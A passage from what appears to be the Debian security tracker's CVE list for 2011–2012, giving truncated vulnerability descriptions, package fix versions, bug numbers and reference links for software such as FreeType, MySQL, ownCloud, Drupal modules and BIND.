NOT-FOR-US: IBM TS3500 Tape Library CVE-2012-5766 RESERVED CVE-2012-5765 (The Web Client (aka CQ Web) in IBM Rational ClearQuest 7.1.2.x before ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-5764 RESERVED CVE-2012-5763 (Cross-site request forgery (CSRF) vulnerability in the WebAdmin ...) NOT-FOR-US: IBM CVE-2012-5762 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...) NOT-FOR-US: IBM CVE-2012-5761 (Cross-site scripting (XSS) vulnerability in the WebAdmin application ...) NOT-FOR-US: IBM CVE-2012-5760 (SQL injection vulnerability in the WebAdmin application 6.0.5, 6.0.8, ...) NOT-FOR-US: IBM CVE-2012-5759 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...) NOT-FOR-US: Websphere CVE-2012-5758 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...) NOT-FOR-US: Websphere CVE-2012-5757 (Cross-site scripting (XSS) vulnerability in the Web Client in IBM ...) NOT-FOR-US: IBM Rational ClearQuest CVE-2012-5756 (The IBM WebSphere DataPower XC10 Appliance 2.0.0.0 through 2.0.0.3 and ...) NOT-FOR-US: Websphere CVE-2012-5755 RESERVED CVE-2012-5754 RESERVED CVE-2012-5753 RESERVED CVE-2012-5752 RESERVED CVE-2012-5751 RESERVED CVE-2012-5750 RESERVED CVE-2012-5749 RESERVED CVE-2012-5748 RESERVED CVE-2012-5747 RESERVED CVE-2012-5746 RESERVED CVE-2012-5745 RESERVED CVE-2012-5744 RESERVED CVE-2012-5743 RESERVED CVE-2012-5742 RESERVED CVE-2012-5741 RESERVED CVE-2012-5740 RESERVED CVE-2012-5739 RESERVED CVE-2012-5738 RESERVED CVE-2012-5737 RESERVED CVE-2012-5736 RESERVED CVE-2012-5735 RESERVED CVE-2012-5734 RESERVED CVE-2012-5733 RESERVED CVE-2012-5732 RESERVED CVE-2012-5731 RESERVED CVE-2012-5730 RESERVED CVE-2012-5729 RESERVED CVE-2012-5728 RESERVED CVE-2012-5727 RESERVED CVE-2012-5726 RESERVED CVE-2012-5725 RESERVED CVE-2012-5724 RESERVED CVE-2012-5723 RESERVED CVE-2012-5722 RESERVED CVE-2012-5721 RESERVED CVE-2012-5720 RESERVED CVE-2012-5719 RESERVED CVE-2012-5718 RESERVED CVE-2012-5717 (Cisco Adaptive Security Appliances (ASA) devices with firmware 8.x ...) NOT-FOR-US: Cisco Adaptive Security Appliances CVE-2012-5716 RESERVED CVE-2012-5715 RESERVED CVE-2012-5714 RESERVED CVE-2012-5713 RESERVED CVE-2012-5712 RESERVED CVE-2012-5711 RESERVED CVE-2012-5710 RESERVED CVE-2012-5709 RESERVED CVE-2012-5708 RESERVED CVE-2012-5707 RESERVED CVE-2012-5706 RESERVED CVE-2012-5705 (Cross-site scripting (XSS) vulnerability in the settings page ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-5704 (The Hotblocks module 6.x-1.x before 6.x-1.8 for Drupal allows remote ...) NOT-FOR-US: Drupal addon not packaged in Debian CVE-2012-5703 (The vSphere API in VMware ESXi 4.1 and ESX 4.1 allows remote attackers ...) NOT-FOR-US: VMware ESXi CVE-2012-5702 RESERVED CVE-2012-5701 RESERVED CVE-2012-5700 RESERVED CVE-2012-5699 RESERVED CVE-2012-5698 RESERVED CVE-2012-5979 REJECTED CVE-2012-5697 RESERVED CVE-2012-5696 RESERVED CVE-2012-5695 RESERVED CVE-2012-5694 RESERVED CVE-2012-5693 RESERVED CVE-2012-5692 (Unspecified vulnerability in admin/sources/base/core.php in Invision ...) NOT-FOR-US: Invision Power Board CVE-2012-5691 (Buffer overflow in RealNetworks RealPlayer before 16.0.0.282 and ...) NOT-FOR-US: RealPlayer CVE-2012-5690 (RealNetworks RealPlayer before 16.0.0.282 and RealPlayer SP 1.0 ...) NOT-FOR-US: RealPlayer CVE-2012-5689 (ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain ...) - bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #699145) [squeeze] - bind9 (Only affects Bind 9.8 and 9.9) - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) CVE-2012-5688 (ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 ...) - bind9 1:9.8.4.dfsg.P1-1 (bug #695192) [squeeze] - bind9 (Only affects 9.8 and 9.9) - isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp) CVE-2012-5687 (Directory traversal vulnerability in the web-based management feature ...) NOT-FOR-US: TP-LINK TL-WR841N router CVE-2012-5686 RESERVED CVE-2012-5685 RESERVED CVE-2012-5684 RESERVED CVE-2012-5683 RESERVED CVE-2012-5682 RESERVED CVE-2012-5681 RESERVED CVE-2012-5680 (Buffer overflow in Adobe Photoshop Camera Raw before 7.3 allows ...) NOT-FOR-US: Adobe Photoshop Camera Raw CVE-2012-5679 (Buffer underflow in Adobe Photoshop Camera Raw before 7.3 allows ...) NOT-FOR-US: Adobe Photoshop Camera Raw CVE-2012-5678 (Adobe Flash Player before 10.3.183.48 and 11.x before 11.5.502.135 on ...) NOT-FOR-US: Adobe Flash CVE-2012-5677 (Integer overflow in Adobe Flash Player before 10.3.183.48 and 11.x ...) NOT-FOR-US: Adobe Flash CVE-2012-5676 (Buffer overflow in Adobe Flash Player before 10.3.183.48 and 11.x ...) NOT-FOR-US: Adobe Flash CVE-2012-5675 (Adobe ColdFusion 9.0 through 9.0.2, and 10, allows local users to ...) NOT-FOR-US: Adobe ColdFusion CVE-2012-5674 (Unspecified vulnerability in Adobe ColdFusion 10 before Update 5, when ...) NOT-FOR-US: Adobe ColdFusion CVE-2012-5673 (Unspecified vulnerability in Adobe Flash Player before 10.3.183.29 and ...) NOT-FOR-US: Adobe Flash Player CVE-2011-5235 (SQL injection vulnerability in mnoGoSearch before 3.3.12 allows remote ...) NOT-FOR-US: mnoGoSearch CVE-2011-5234 (SQL injection vulnerability in user.php in Social Network Community 2 ...) NOT-FOR-US: Social Network Community CVE-2011-5233 (Heap-based buffer overflow in IrfanView before 4.32 allows remote ...) NOT-FOR-US: IrfanView CVE-2011-5232 REJECTED CVE-2011-5231 REJECTED CVE-2011-5230 (Multiple SQL injection vulnerabilities in the selectUserIdByLoginPass ...) NOT-FOR-US: Seotoaster CVE-2011-5229 (SQL injection vulnerability in quickstart/profile/index.php in the ...) NOT-FOR-US: appRain CMF CVE-2011-5228 (Cross-site scripting (XSS) vulnerability in the Search module ...) NOT-FOR-US: appRain CMF CVE-2011-5227 (Stack-based buffer overflow in the Syslog service (nssyslogd.exe) in ...) NOT-FOR-US: Enterasys Network Management Suite CVE-2011-5226 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: WordPress plugin Sentinel CVE-2011-5225 (Cross-site scripting (XSS) vulnerability in wordpress_sentinel.php in ...) NOT-FOR-US: WordPress plugin Sentinel CVE-2011-5224 (SQL injection vulnerability in the Sentinel plugin 1.0.0 for WordPress ...) NOT-FOR-US: WordPress plugin Sentinel CVE-2011-5223 (Cross-site request forgery (CSRF) vulnerability in logout.php in Cacti ...) - cacti 0.8.7i-1 CVE-2011-5222 (SQL injection vulnerability in rub2_w.php in PHP Flirt-Projekt 4.8 and ...) NOT-FOR-US: PHP Flirt-Projekt CVE-2011-5221 (Cross-site scripting (XSS) vulnerability in the getLog function in ...) - websvn 2.3.1-1 CVE-2011-5220 (Cross-site scripting (XSS) vulnerability in ...) NOT-FOR-US: PHP-SCMS CVE-2011-5219 (Directory traversal vulnerability in examples/show_code.php in mPDF ...) NOT-FOR-US: mPDF CVE-2011-5218 (SQL injection vulnerability in DotA OpenStats 1.3.9 and earlier allows ...) NOT-FOR-US: DotA OpenStats CVE-2011-5217 (Directory traversal vulnerability in the PXE Mtftp service in Hitachi ...) NOT-FOR-US: Hitachi JP1/ServerConductor/DeploymentManager CVE-2011-5216 (SQL injection vulnerability in ajax.php in SCORM Cloud For WordPress ...) NOT-FOR-US: WordPress plugin SCORM Cloud CVE-2011-5215 (SQL injection vulnerability in index.php in Video Community Portal ...) NOT-FOR-US: Video Community Portal CVE-2011-5214 (Multiple cross-site scripting (XSS) vulnerabilities in BrowserCRM ...) NOT-FOR-US: BrowserCRM CVE-2011-5213 (Multiple SQL injection vulnerabilities in BrowserCRM 5.100.01 and ...) NOT-FOR-US: BrowserCRM CVE-2012-5672 (Microsoft Excel Viewer (aka Xlview.exe) and Excel in Microsoft Office ...) NOT-FOR-US: Microsoft Office CVE-2012-5671 (Heap-based buffer overflow in the dkim_exim_query_dns_txt function in ...) {DSA-2566-1} - exim4 4.80-5.1 (medium) CVE-2012-5670 (The _bdf_parse_glyphs function in FreeType before 2.4.11 allows ...) - freetype 2.4.9-1.1 (bug #696691) [squeeze] - freetype (Version in Squeeze doesn't parse alternative encoding format yet) NOTE: https://savannah.nongnu.org/bugs/?37907 NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=7f2e4f4f553f6836be7683f66226afac3fa979b8 CVE-2012-5669 (The _bdf_parse_glyphs function in FreeType before 2.4.11 allows ...) - freetype 2.4.9-1.1 (unimportant; bug #696691) NOTE: https://savannah.nongnu.org/bugs/?37906 NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=07bdb6e289c7954e2a533039dc93c1c136099d2d CVE-2012-5668 (FreeType before 2.4.11 allows context-dependent attackers to cause a ...) - freetype 2.4.9-1.1 (unimportant; bug #696691) NOTE: https://savannah.nongnu.org/bugs/?37905 NOTE: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=9b6b5754b57c12b820e01305eb69b8863a161e5a CVE-2012-5667 (Multiple integer overflows in GNU Grep before 2.11 might allow ...) - grep 2.11-1 (bug #701897) NOTE: https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473 NOTE: patch http://git.savannah.gnu.org/cgit/grep.git/commit/?id=cbbc1a45b9f843c811905c97c90a5d31f8e6c189 NOTE: http://www.openwall.com/lists/oss-security/2012/12/22/1 CVE-2012-5666 (Cross-site scripting (XSS) vulnerability in bookmarks/js/bookmarks.js ...) - owncloud 4.0.8debian-1.3 (bug #696574) [wheezy] - owncloud 4.0.4debian2-3.2 CVE-2012-5665 (ownCloud 4.0.x before 4.0.10 and 4.5.x before 4.5.5 does not properly ...) - owncloud 4.0.8debian-1.3 (bug #696574) [wheezy] - owncloud 4.0.4debian2-3.2 CVE-2012-5664 REJECTED CVE-2012-5663 RESERVED NOT-FOR-US: Isearch NOTE: http://www.openwall.com/lists/oss-security/2012/12/21/1 CVE-2012-5662 RESERVED - ibm-3270 (bug #706547) [wheezy] - ibm-3270 (Non-free not supported) [squeeze] - ibm-3270 (Non-free not supported) CVE-2012-5661 REJECTED CVE-2012-5660 (abrt-action-install-debuginfo in Automatic Bug Reporting Tool (ABRT) ...) NOT-FOR-US: abrt is Red Hat / Fedora specific CVE-2012-5659 (Untrusted search path vulnerability in ...) NOT-FOR-US: abrt is Red Hat / Fedora specific CVE-2012-5658 (rhc-chk.rb in Red Hat OpenShift Origin before 1.1, when -d (debug ...) NOT-FOR-US: OpenShift CVE-2012-5657 (The (1) Zend_Feed_Rss and (2) Zend_Feed_Atom classes in Zend_Feed in ...) {DSA-2602-1} - zendframework 1.11.13-1.1 (bug #696483) NOTE: http://www.openwall.com/lists/oss-security/2012/12/20/2 NOTE: http://framework.zend.com/security/advisory/ZF2012-05 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=889037 NOTE: http://secunia.com/advisories/51583 CVE-2012-5656 (The rasterization process in Inkscape before 0.48.4 allows local users ...) - inkscape 0.48.3.1-1.2 (bug #696485) CVE-2012-5655 (The Context module 6.x-3.x before 6.x-3.1 and 7.x-3.x before ...) NOT-FOR-US: Context module for Drupal CVE-2012-5654 (The Nodewords: D6 Meta Tags module before 6.x-1.14 for Drupal, when ...) NOT-FOR-US: Nodewords: D6 Meta Tags module for Drupal CVE-2012-5653 (The file upload feature in Drupal 6.x before 6.27 and 7.x before 7.18 ...) - drupal6 (bug #696343) - drupal7 7.14-1.2 (bug #696342) NOTE: http://drupal.org/SA-CORE-2012-004 CVE-2012-5652 (Drupal 6.x before 6.27 allows remote attackers to obtain sensitive ...) - drupal6 (bug #696343) NOTE: http://drupal.org/SA-CORE-2012-004 CVE-2012-5651 (Drupal 6.x before 6.27 and 7.x before 7.18 displays information for ...) - drupal6 (bug #696343) - drupal7 7.14-1.2 (bug #696342) NOTE: http://drupal.org/SA-CORE-2012-004 CVE-2012-5650 [DOM based XSS via Futon UI] RESERVED - couchdb 1.2.0-5 (bug #698439) CVE-2012-5649 [JSONP arbitrary code execution with Adobe Flash] RESERVED - couchdb 1.2.0-5 (bug #698439) CVE-2012-5648 RESERVED CVE-2012-5647 (Open redirect vulnerability in node-util/www/html/restorer.php in Red ...) NOT-FOR-US: OpenShift CVE-2012-5646 (node-util/www/html/restorer.php in the Red Hat OpenShift Origin before ...) NOT-FOR-US: OpenShift CVE-2012-5645 RESERVED - freeciv (low; bug #696306) [squeeze] - freeciv (Minor issue) [wheezy] - freeciv (Minor issue) CVE-2012-5644 [(Complete) Information disclosure when moving user's home directory] RESERVED - libuser (low; bug #705690) [wheezy] - libuser (Minor issue) [squeeze] - libuser (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=885724#c7 CVE-2012-5643 (Multiple memory leaks in tools/cachemgr.cc in cachemgr.cgi in Squid ...) {DSA-2631-1} - squid 2.7.STABLE9-2 NOTE: squid-cgi was removed in 2.7.STABLE9-2 - squid3 3.1.20-2.1 (bug #696187) NOTE: possible regression, see #701123 CVE-2012-5642 (server/action.py in Fail2ban before 0.8.8 does not properly handle the ...) - fail2ban 0.8.6-3wheezy1 (low; bug #696184) [squeeze] - fail2ban (Introduced in 0.8.6, see #696187) CVE-2012-5641 RESERVED - couchdb (Only affects CouchDB on Windows) CVE-2012-5640 [thttpd: Local DoS vulnerability] RESERVED - thttpd (low) [squeeze] - thttpd (Minor issue) CVE-2012-5639 RESERVED - libreoffice (low) [wheezy] - libreoffice (Minor issue) - openoffice.org 1:3.3.0-1 (low) [squeeze] - openoffice.org (Minor issue) NOTE: Since 3.3.0 openoffice.org is a transitional source package NOTE: https://bugs.freedesktop.org/show_bug.cgi?id=58295 CVE-2012-5638 (The setup_logging function in log.h in SANLock uses world-writable ...) - sanlock 2.2-2 (bug #696424) CVE-2012-5637 RESERVED CVE-2012-5636 RESERVED CVE-2012-5635 (The GlusterFS functionality in Red Hat Storage Management Console 2.0, ...) - glusterfs (bug #704944) CVE-2012-5634 (Xen 4.2.x, 4.1.x, and 4.0, when using Intel VT-d for PCI passthrough, ...) {DSA-2636-1} - xen 4.1.3-8 (low) CVE-2012-5633 (The URIMappingInterceptor in Apache CXF before 2.5.8, 2.6.x before ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-5632 RESERVED CVE-2012-5631 RESERVED NOT-FOR-US: FreeIPA CVE-2012-5630 [TOCTOU race conditions by copying and removing directory trees] RESERVED - libuser (low; bug #705690) [wheezy] - libuser (Minor issue) [squeeze] - libuser (Minor issue) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=884685#c31 CVE-2012-5629 (The default configuration of the (1) LdapLoginModule and (2) ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-5628 RESERVED NOT-FOR-US: gofer component of PULP project CVE-2012-5627 [Insecure salt value usage when in the same mysql session] RESERVED - mysql-5.1 (low) - mysql-5.5 (low) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=883719 CVE-2012-5626 RESERVED CVE-2012-5625 (OpenStack Compute (Nova) Folsom before 2012.2.2 and Grizzly, when ...) - nova (Only affects OpenStack Folsom, bug #695830) CVE-2012-5624 (The XMLHttpRequest object in Qt before 4.8.4 enables http redirection ...) - qt4-x11 4:4.8.2+dfsg-7 (bug #695156) [squeeze] - qt4-x11 (Vulnerable code not present) NOTE: http://lists.qt-project.org/pipermail/announce/2012-November/000014.html CVE-2012-5623 RESERVED NOT-FOR-US: change_passwd plugin for Squirrelmail CVE-2012-5622 (Cross-site request forgery (CSRF) vulnerability in the management ...) NOT-FOR-US: OpenShift CVE-2012-5621 [Ekiga (x < 4.0.0): DoS (crash) after receiving call from other party with not UTF-8 valid name] RESERVED - ekiga 3.2.7-6 (bug #702282; low) [squeeze] - ekiga (Minor issue) CVE-2012-5620 RESERVED NOT-FOR-US: Docecot non-issue, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=695138#15 CVE-2012-5619 RESERVED - sleuthkit (unimportant; bug #695097) NOTE: Hardly a vulnerability CVE-2012-5618 RESERVED NOT-FOR-US: Ushahidi CVE-2012-5617 [privilege escalation due to improper authentication settings in policykit configuration file] RESERVED - gksu-polkit (bug #695807) NOTE: http://www.openwall.com/lists/oss-security/2012/12/12/8 CVE-2012-5616 (Apache CloudStack 4.0.0-incubating and Citrix CloudPlatform (formerly ...) NOT-FOR-US: CloudStack CVE-2012-5615 (MySQL 5.5.19 and possibly other versions, and MariaDB 5.5.28a, 5.3.11, ...) - mysql-5.1 (low; bug #695001) - mysql-5.5 (low; bug #695001) NOTE: https://mariadb.atlassian.net/browse/MDEV-3909 NOTE: http://seclists.org/fulldisclosure/2012/Dec/9 CVE-2012-5614 (Oracle MySQL 5.1.67 and earlier and 5.5.29 and earlier, and MariaDB ...) - mysql-5.5 5.5.30+dfsg-1 (low; bug #695001) - mysql-5.1 NOTE: https://mariadb.atlassian.net/browse/MDEV-3910 NOTE: http://seclists.org/fulldisclosure/2012/Dec/7 CVE-2012-5613 (** DISPUTED ** ...) - mysql-5.1 (unimportant; bug #695001) - mysql-5.5 (unimportant; bug #695001) NOTE: Disputed as incorrect configuration NOTE: http://seclists.org/fulldisclosure/2012/Dec/6 CVE-2012-5612 (Heap-based buffer overflow in Oracle MySQL 5.5.19 and other versions ...) - mysql-5.1 (MDL was introduced in 5.5) - mysql-5.5 5.5.29+dfsg-1 (bug #695001) NOTE: https://mariadb.atlassian.net/browse/MDEV-3908 CVE-2012-5611 (Stack-based buffer overflow in the acl_get function in Oracle MySQL ...) {DSA-2581-1} - mysql-5.1 (bug #695001) - mysql-5.5 5.5.29+dfsg-1 (bug #695001) NOTE: http://seclists.org/fulldisclosure/2012/Dec/4 CVE-2012-5610 (Incomplete blacklist vulnerability in lib/filesystem.php in ownCloud ...) - owncloud 4.0.8debian-1.1 (bug #693990) [wheezy] - owncloud 4.0.4debian2-3.1 NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2 CVE-2012-5609 (Incomplete blacklist vulnerability in lib/migrate.php in ownCloud ...) - owncloud 4.0.8debian-1.1 (bug #693990) [wheezy] - owncloud 4.0.4debian2-3.1 NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2 CVE-2012-5608 (Cross-site scripting (XSS) vulnerability in ...) - owncloud 4.0.8debian-1.1 (bug #693990) [wheezy] - owncloud 4.0.4debian2-3.1 NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2 CVE-2012-5607 (The "Lost Password" reset functionality in ownCloud before 4.0.9 and ...) - owncloud 4.0.8debian-1.1 (bug #693990) [wheezy] - owncloud 4.0.4debian2-3.1 NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2 CVE-2012-5606 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...) - owncloud 4.0.8debian-1.1 (bug #693990) [wheezy] - owncloud 4.0.4debian2-3.1 NOTE: http://www.openwall.com/lists/oss-security/2012/11/30/2 CVE-2012-5605 (Grinder in Red Hat CloudForms before 1.1 uses world-writable ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-5604 (The ldap_fluff gem for Ruby, as used in Red Hat CloudFroms 1.1, when ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-5603 (proxies_controller.rb in Katello in Red Hat CloudForms before 1.1 does ...) NOT-FOR-US: Red Hat CloudForms CVE-2012-5602 REJECTED CVE-2012-5601 REJECTED CVE-2012-5600 REJECTED CVE-2012-5599 REJECTED CVE-2012-5598 REJECTED CVE-2012-5597 REJECTED CVE-2012-5596 REJECTED CVE-2012-5595 REJECTED CVE-2012-5594 REJECTED CVE-2012-5593 REJECTED CVE-2012-5592 REJECTED CVE-2012-5591 (Cross-site scripting (XSS) vulnerability in the Zero Point module ...) NOT-FOR-US: Drupal Zero Point module CVE-2012-5590 (SQL injection vulnerability in the Webmail Plus module for Drupal ...) NOT-FOR-US: Drupal Webmail Plus module CVE-2012-5589 (The MultiLink module 6.x-2.x before 6.x-2.7 and 7.x-2.x before 7.x-2.7 ...) NOT-FOR-US: Drupal MultiLink module CVE-2012-5588 (The Email Field module 6.x-1.x before 6.x-1.3 for Drupal, when using a ...) NOT-FOR-US: Drupal Email Field module CVE-2012-5587 (Cross-site scripting (XSS) vulnerability in the Email Field module ...) NOT-FOR-US: Drupal Email Field module CVE-2012-5586 (The Services module 6.x-3.x before 6.x-3.3 and 7.x-3.x before 7.x-3.3 ...) NOT-FOR-US: Drupal Services module CVE-2012-5585 (Cross-site scripting (XSS) vulnerability in the Mixpanel module ...) NOT-FOR-US: Drupal Mixpanel module CVE-2012-5584 (The Table of Contents module 6.x-3.x before 6.x-3.8 for Drupal does ...) NOT-FOR-US: Drupal Table of Contents module CVE-2012-5583 [phpcas curl usage] RESERVED - php-cas 1.3.1-2 - moodle [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy1 NOTE: https://github.com/Jasig/phpCAS/pull/58 CVE-2012-5582 [opendnssec curl usage] RESERVED - opendnssec (eppclient not built in Debian package) NOTE: http://lists.opendnssec.org/pipermail/opendnssec-user/2012-November/002296.html CVE-2012-5581 (Stack-based buffer overflow in tif_dir.c in LibTIFF before 4.0.2 ...) {DSA-2589-1} - tiff 4.0.2-1 (bug #694693) - tiff3 3.9.6-10 NOTE: http://www.openwall.com/lists/oss-security/2012/11/28/1 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=867235 CVE-2012-5580 [libproxy: format string issue] RESERVED - libproxy 0.3.1-4 (low) [squeeze] - libproxy (Minor issue) NOTE: https://bugzilla.novell.com/show_bug.cgi?id=791086 NOTE: https://code.google.com/p/libproxy/source/detail?r=475 CVE-2012-5579 REJECTED CVE-2012-5578 [Python keyring insecure permissions on new databases] RESERVED - python-keyring 0.9.2-1.1 (bug #696736) [wheezy] - python-keyring 0.7.1-1+deb7u1 CVE-2012-5577 [Python keyring insecure permissions on migrated files] RESERVED - python-keyring 0.9.2-1.1 (bug #696736) [wheezy] - python-keyring 0.7.1-1+deb7u1 CVE-2012-5576 (Multiple stack-based buffer overflows in file-xwd.c in the X Window ...) - gimp 2.8.2-2 (bug #693977) NOTE: Upstream fix http://git.gnome.org/browse/gimp/commit/?id=2873262fccba12af144ed96ed91be144d92ff2e1 NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=687392 NOTE: http://www.openwall.com/lists/oss-security/2012/11/21/2 CVE-2012-5575 RESERVED NOT-FOR-US: Apache CXF CVE-2012-5574 (lib/form/sfForm.class.php in Symfony CMS before 1.4.20 allows remote ...) NOT-FOR-US: Symfony CVE-2012-5573 (The connection_edge_process_relay_cell function in or/relay.c in Tor ...) - tor 0.2.3.25-1 (low) [squeeze] - tor (Minor issue) CVE-2012-5572 [Dancer::Cookie: Cookie name CRLF injection] RESERVED - libdancer-perl (low; bug #694279) NOTE: https://github.com/PerlDancer/Dancer/issues/859 CVE-2012-5571 (OpenStack Keystone Essex (2012.1) and Folsom (2012.2) does not ...) - keystone 2012.1.1-11 (bug #694433) CVE-2012-5570 RESERVED CVE-2012-5569 (Multiple cross-site scripting (XSS) vulnerabilities in the Basic ...) NOT-FOR-US: Drupal Webmail module CVE-2012-5568 (Apache Tomcat through 7.0.x allows remote attackers to cause a denial ...) - tomcat6 (low) [squeeze] - tomcat6 (Minor issue) [wheezy] - tomcat6 (Minor issue) - tomcat7 (low) [wheezy] - tomcat7 (Minor issue) CVE-2012-5567 RESERVED - kronolith2 (Vulnerable code not present in 2.x codebase and later versions not yet packaged in sid) CVE-2012-5566 RESERVED - kronolith2 (Vulnerable code not present in 2.x codebase and later versions not yet packaged in sid) CVE-2012-5565 RESERVED NOT-FOR-US: This doesn't seem to be packaged in sid's Horde and the imp3 and dimp1 packages from stable do not include the affected code CVE-2012-5564 (android-tools 4.1.1 in Android Debug Bridge (ADB) allows local users ...) - android-tools (bug #688280) CVE-2012-5563 (OpenStack Keystone, as used in OpenStack Folsom 2012.2, does not ...) - keystone (Folsom branch not packaged yet) CVE-2012-5562 RESERVED CVE-2012-5561 (script/katello-generate-passphrase in Katello 1.1 uses world-readable ...) NOT-FOR-US: Katello CVE-2012-5560 RESERVED NOT-FOR-US: MATE gnome fork CVE-2012-5559 (Cross-site scripting (XSS) vulnerability in the page manager node view ...) NOT-FOR-US: Drupal chaos tool addon CVE-2012-5558 RESERVED CVE-2012-5557 (The User Read-Only module 6.x-1.x before 6.x-1.4 and 7.x-1.x before ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5556 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5555 RESERVED CVE-2012-5554 (The default configuration for the Webform CiviCRM Integration module ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5553 (Multiple cross-site scripting (XSS) vulnerabilities in the OM Maximenu ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5552 (The Password policy module 6.x-1.x before 6.x-1.5 and 7.x-1.x before ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5551 (Multiple cross-site scripting (XSS) vulnerabilities in the MailChimp ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5550 (SQL injection vulnerability in the Time Spent module 6.x and 7.x for ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5549 (Cross-site request forgery (CSRF) vulnerability in the Time Spent ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5548 (Cross-site scripting (XSS) vulnerability in the Time Spent module 6.x ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5547 (Multiple cross-site request forgery (CSRF) vulnerabilities in the ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5546 RESERVED CVE-2012-5545 (Multiple cross-site scripting (XSS) vulnerabilities in the ShareThis ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5544 (The Mandrill module 7.x-1.x before 7.x-1.2 for Drupal allows remote ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5543 (The Feeds module 7.x-2.x before 7.x-2.0-alpha6 for Drupal, when a ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5542 (Cross-site request forgery (CSRF) vulnerability in the Commerce Extra ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5541 (Cross-site scripting (XSS) vulnerability in the Twitter Pull module ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5540 (Multiple cross-site scripting (XSS) vulnerabilities in the Hostip ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5539 (The Organic Groups (OG) module 7.x-1.x before 7.x-1.5 for Drupal does ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5538 (Cross-site scripting (XSS) vulnerability in the FileField Sources ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5537 (The Simplenews Scheduler module 6.x-2.x before 6.x-2.4 for Drupal ...) NOT-FOR-US: Drupal contributed-module CVE-2012-5536 (A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat ...) NOT-FOR-US: Red Hat-specific packaging flaw CVE-2012-5535 RESERVED - gnome-system-log (Fedora-specific issue) CVE-2012-5534 (The hook_process function in the plugin API for WeeChat 0.3.0 through ...) {DSA-2598-1} - weechat 0.3.9.2-1 [wheezy] - weechat 0.3.8-1+deb7u1 CVE-2012-5533 (The http_request_split_value function in request.c in lighttpd before ...) - lighttpd 1.4.31-2 [squeeze] - lighttpd (Introduced in 1.4.31) CVE-2012-5532 (The main function in tools/hv/hv_kvp_daemon.c in hypervkvpd, as ...) - linux (unimportant) - linux-2.6 (userspace daemon not yet present) NOTE: hyperv tools are not build in sid CVE-2012-5531 (Multiple cross-site scripting (XSS) vulnerabilities in the GateIn ...) NOT-FOR-US: GateIn Portal CVE-2012-5530 (The (1) pcmd and (2) pmlogger init scripts in Performance Co-Pilot ...) - pcp 3.7.1 (bug #698735; low) NOTE: first package in unstable is 3.7.1 (package has no debian revision) [squeeze] - pcp (Minor issue) CVE-2012-5529 (TraceManager in Firebird 2.5.0 and 2.5.1, when trace is enabled, ...) {DSA-2648-1} - firebird2.5 2.5.2~svn+54698.ds4-2 (low; bug #693210) - firebird2.1 (Only affects 2.5.x) CVE-2012-5528 RESERVED CVE-2012-5527 RESERVED - claws-mail-extra-plugins 3.8.1-2 (unimportant; bug #693391) NOTE: More of a plain bug than a security vulnerability CVE-2012-5526 (CGI.pm module before 3.63 for Perl does not properly escape newlines ...) {DSA-2587-1 DSA-2586-1} - perl 5.14.2-16 (bug #693420) - libcgi-pm-perl 3.61-2 (bug #693421) NOTE: http://cpansearch.perl.org/src/MARKSTOS/CGI.pm-3.63/Changes NOTE: https://github.com/markstos/CGI.pm/pull/23 NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=877015 CVE-2012-5525 (The get_page_from_gfn hypercall function in Xen 4.2 allows local PV ...) - xen (Only affects Xen 4.2 and xen-unstable) CVE-2012-5524 RESERVED - gajim (low; bug #693282) [wheezy] - gajim (Minor issue) [squeeze] - gajim (Minor issue) CVE-2012-5523 (core/email_api.php in MantisBT before 1.2.12 does not properly manage ...) - mantis 1.2.11-1.2 (bug #693283) NOTE: http://www.mantisbt.org/bugs/view.php?id=14704 CVE-2012-5522 (MantisBT before 1.2.12 